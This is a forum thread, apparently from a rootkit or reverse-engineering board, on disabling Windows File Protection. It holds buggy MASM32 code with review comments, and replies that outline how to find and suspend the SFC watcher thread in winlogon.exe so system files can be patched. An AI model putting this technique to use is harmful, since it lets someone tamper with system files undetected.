 #12048  by osC7h
 Fri Mar 09, 2012 8:11 pm
Hi again, my project does not work. How can I detect the target thread ID (the SFC watcher thread inside winlogon.exe)?
; Reviewer notes (MASM32, 32-bit Win32 fragment).  This is a flat listing: the
; szText/func macros, the hSnapshot*/hxThread/sxThread variables, the ProcEnt/
; ModuleE/ThreadE structures, xSYSFile and the hx*/dx*/px* locals are declared
; elsewhere and are not visible here.
; What the visible code does: walk processes for "winlogon.exe", walk that
; process's modules for "sfc_os.dll", then walk a thread snapshot, suspend each
; thread it can open and probe whether SFC still restores a deliberately
; corrupted file (DOS signature flipped, 7 s wait, signature re-read).
szText Problem_ANA ,"winlogon.exe"	; process to find (compared case-insensitively below)
szText Problem_BABA ,"SFC :)"		; not referenced anywhere in this fragment
szText Problem_COCUK ,"sfc_os.dll"	; module whose thread is being hunted

invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS,0
.IF (eax != INVALID_HANDLE_VALUE)
	mov hSnapshotP, eax
	mov [ProcEnt.dwSize], sizeof ProcEnt	; dwSize must be filled in before Process32First
	invoke Process32First, hSnapshotP, ADDR ProcEnt
	.IF (eax)
		@0P:
		invoke lstrcmpi, addr Problem_ANA ,addr [ProcEnt.szExeFile]
		.IF (eax == 0)
			; NOTE(review): hSnapshotM is never closed (one leaked handle per match) and the
			; return value of Module32First is not checked before ModuleE is read.
			invoke CreateToolhelp32Snapshot, TH32CS_SNAPMODULE, [ProcEnt.th32ProcessID]
			mov hSnapshotM, eax
			mov [ModuleE.dwSize], sizeof ModuleE
			invoke Module32First, hSnapshotM, ADDR ModuleE
			@0M:
			invoke lstrcmpi, addr Problem_COCUK ,addr [ModuleE.szModule]
			.if (eax == 0)
				; NOTE(review): TH32CS_SNAPTHREAD is a system-wide snapshot; the PID argument is
				; not a filter.  Nothing below compares [ThreadE.th32OwnerProcessID] with
				; [ProcEnt.th32ProcessID], so every thread on the machine that OpenThread
				; succeeds on gets suspended in turn.  hSnapshotT is also never closed and the
				; result of Thread32First is not checked.
				invoke CreateToolhelp32Snapshot, TH32CS_SNAPTHREAD, [ProcEnt.th32ProcessID]
				mov hSnapshotT, eax
				mov [ThreadE.dwSize], sizeof ThreadE
				invoke Thread32First, hSnapshotT, ADDR ThreadE
				@0T:
				; Opening winlogon's threads presumably needs an elevated / SeDebugPrivilege
				; token; nothing here enables one — confirm against the caller.
				invoke OpenThread, THREAD_SUSPEND_RESUME, NULL, [ThreadE.th32ThreadID]
				.if (eax)
					mov hxThread, eax		; NOTE(review): this handle is never closed
					add sxThread, 1
					.if (sxThread == 1)		; skips only the first thread of the whole snapshot, not winlogon's main thread
						jmp		@0NT
					.endif
					push eax			; NOTE(review): no matching pop on any path — ESP drifts 4 bytes per iteration
					invoke SuspendThread, eax	; NOTE(review): no ResumeThread anywhere; every thread reached here stays suspended
					; --- probe, pass 1: flip the DOS signature of xSYSFile and rewrite the file ---
					mov					hxSYSFile, func(CreateFile, offset xSYSFile, GENERIC_READ + GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0)
					.If					eax != INVALID_HANDLE_VALUE
						mov				dxSYSFileSize, func(GetFileSize, hxSYSFile, 0)
						mov				pxSYSBuffer, func(VirtualAlloc, NULL, dxSYSFileSize, MEM_COMMIT, PAGE_READWRITE)
						.If				eax != NULL
							invoke		ReadFile, hxSYSFile, pxSYSBuffer, dxSYSFileSize, offset dxBytesRW, NULL	; dxBytesRW is never compared with dxSYSFileSize
							mov			esi, pxSYSBuffer
							xor			[esi].IMAGE_DOS_HEADER.e_magic, IMAGE_DOS_SIGNATURE	; 'MZ' xor 'MZ' -> 0: header is now invalid
							invoke		CloseHandle, hxSYSFile
							; NOTE(review): CREATE_ALWAYS truncates and rewrites the whole file; the handle is not checked before WriteFile
							mov         hxtSYSFile, func(CreateFile, offset xSYSFile, GENERIC_READ + GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)
							invoke      WriteFile, hxtSYSFile, pxSYSBuffer, dxSYSFileSize, offset dxBytesRW, NULL
							invoke      CloseHandle, hxtSYSFile
							invoke		VirtualFree, pxSYSBuffer, 0, MEM_RELEASE
						.Else
							invoke		CloseHandle, hxSYSFile	;	[Error] Unable to allocate memory for file
					.EndIf
					.Else
						;	[Error] Unable to open the file
					.EndIf
					invoke	Sleep, 7000	; give SFC time to notice and restore the file
					; --- probe, pass 2: re-read the file and see whether the signature came back ---
					mov					hxSYSFile, func(CreateFile, offset xSYSFile, GENERIC_READ + GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0)
					.If					eax != INVALID_HANDLE_VALUE
						mov				dxSYSFileSize, func(GetFileSize, hxSYSFile, 0)
						mov				pxSYSBuffer, func(VirtualAlloc, NULL, dxSYSFileSize, MEM_COMMIT, PAGE_READWRITE)
						.If				eax != NULL
							invoke		ReadFile, hxSYSFile, pxSYSBuffer, dxSYSFileSize, offset dxBytesRW, NULL
							mov			esi, pxSYSBuffer
							.If			[esi].IMAGE_DOS_HEADER.e_magic == IMAGE_DOS_SIGNATURE
								; SFC restored the file: the suspended thread was not the watcher.
								; NOTE(review): it is left suspended anyway (see SuspendThread above).
								invoke	VirtualFree, pxSYSBuffer, 0, MEM_RELEASE
								invoke	CloseHandle, hxSYSFile
								
								jmp		@0NT
							.Else
								; Not restored: undo the corruption and write the original header back.
								; NOTE(review): there is no jump out of the thread loop here, so the
								; enumeration continues and suspends further threads.
								xor		[esi].IMAGE_DOS_HEADER.e_magic, IMAGE_DOS_SIGNATURE	; 0 xor 'MZ' -> 'MZ'
								invoke	CloseHandle, hxSYSFile
								mov     hxtSYSFile, func(CreateFile, offset xSYSFile, GENERIC_READ + GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)
								invoke  WriteFile, hxtSYSFile, pxSYSBuffer, dxSYSFileSize, offset dxBytesRW, NULL
								invoke  CloseHandle, hxtSYSFile
								
							.EndIf
							invoke		VirtualFree, pxSYSBuffer, 0, MEM_RELEASE
						.Else
							invoke		CloseHandle, hxSYSFile	;	[Error] Unable to allocate memory for file
						.endif
					.Else
						;	[Error] Unable to open the file
					.endif	
					;.if [ModuleE.hModule] == eax
					; (review) A deterministic selector, as described in the reply below, is to
					; query each thread's start address (NtQueryInformationThread) and check that
					; it falls inside the sfc_os.dll module range, instead of the
					; first-thread / corrupt-and-wait heuristic used here.
				
				.endif
				@0NT:
				invoke Thread32Next, hSnapshotT, ADDR ThreadE
				test eax,eax
				jnz @0T
			.endif
			invoke Module32Next, hSnapshotM, ADDR ModuleE
			test eax,eax
			jnz @0M

		.ENDIF
		invoke Process32Next, hSnapshotP,ADDR ProcEnt
		test eax,eax
		jnz @0P
	.ENDIF
.ENDIF
invoke CloseHandle, hSnapshotP	; only the process snapshot is released; module/thread snapshots and thread handles leak
 #12049  by everdox
 Fri Mar 09, 2012 11:00 pm
Maybe I have read you wrong here, but you are on the right track with your code. The Toolhelp API uses NtQuerySystemInformation with the SystemProcessInformation class, and appended to the end of each process entry is an array of per-thread entries (http://undocumented.ntinternals.net/Use ... HREAD.html), so check the ClientId of each one. Or, in the case of the Toolhelp API, Thread32First/Thread32Next fill the THREADENTRY32 buffer with the owning process ID (th32OwnerProcessID) — note that TH32CS_SNAPTHREAD snapshots every thread on the system regardless of the PID you pass — so just match them up against winlogon's PID.
 #12050  by EP_X0FF
 Sat Mar 10, 2012 2:38 am
SetSfcFileException should do the trick without suspending or terminating the watcher thread.
 #12096  by osC7h
 Tue Mar 13, 2012 3:26 pm
How do I walk the thread entries (first/next) that follow each process entry?
szText Problem_ANA ,"winlogon.exe"	; process to find (compared case-insensitively below)

; SystemProcessInformation (class 5): first call with a NULL buffer to learn the size.
; NOTE(review): for this class the returned length is only a hint — the process list can
; change between the two calls; the usual pattern retries while the status is
; STATUS_INFO_LENGTH_MISMATCH, growing the buffer each time.
invoke NtQuerySystemInformation, 5, NULL, 0, ADDR dwReturnLength
invoke VirtualAlloc, NULL, dwReturnLength, MEM_COMMIT, PAGE_READWRITE
TEST EAX, EAX
JE EndMain				; allocation failed
MOV EDI, EAX				; EDI = buffer base (the only address MEM_RELEASE accepts)
invoke NtQuerySystemInformation, 5, EDI, dwReturnLength, ADDR dwReturnLength
TEST EAX, EAX				; NTSTATUS: zero is STATUS_SUCCESS, anything else is an error here
JNE FreeMem
ASSUME EDI:PTR SYSTEM_PROCESS_INFORMATION	; ntinternals-style field names (NextEntryDelta, ProcessName, Threads)
ProcessLoop:
MOV EAX, [EDI].ProcessName.Buffer
TEST EAX, EAX
JE NextItem				; entries without an image name are skipped
invoke WideToAnsi, EAX			; helper not shown; presumably converts into szBuffer — confirm
invoke lstrcmpi, addr Problem_ANA, addr szBuffer
.if (eax == 0)
	; The per-thread entries sit directly after this process entry (see the earlier reply):
	; walk them from [EDI].Threads using the entry's thread-count field, and read each
	; thread's ClientId.UniqueThread.  NextEntryDelta jumps over them, so this is the
	; only place they can be read.
	MOV EAX, [EDI].Threads.........????????????????????????????????????????????????????????????

.endif
NextItem:
CMP [EDI].NextEntryDelta, 0		; a zero delta marks the last entry
JE FreeMem
ADD EDI, [EDI].NextEntryDelta		; NOTE(review): from here on EDI is no longer the allocation base
JMP ProcessLoop
FreeMem:
; NOTE(review): VirtualFree with MEM_RELEASE requires the base address returned by
; VirtualAlloc.  On the JE FreeMem path from NextItem EDI has been advanced, so this
; call fails and the buffer leaks — keep the base pointer in a separate variable.
invoke VirtualFree, EDI, 0, MEM_RELEASE
EndMain:
 #12129  by EP_X0FF
 Thu Mar 15, 2012 11:20 am
You have already got all the answers. No one will write the code for you.

1. Locate winlogon (Process32First/Process32Next, or NtQuerySystemInformation)
2. Locate the sfc dll inside it (Module32First/Module32Next) and note its base address and size
3. Enumerate winlogon's threads (Thread32First/Thread32Next, or NtQuerySystemInformation)
4. Get each thread's start address (NtQueryInformationThread) and check whether it lies within the sfc dll's range
5. Suspend that thread, patch the system file, then resume it.

or use the SFC API I mentioned above. STFG.
 #12157  by R00tKit
 Fri Mar 16, 2012 8:17 am
Great method (suspending the thread) — I have used it elsewhere too (unpacking, ...).

STFG :lol: :lol: :lol: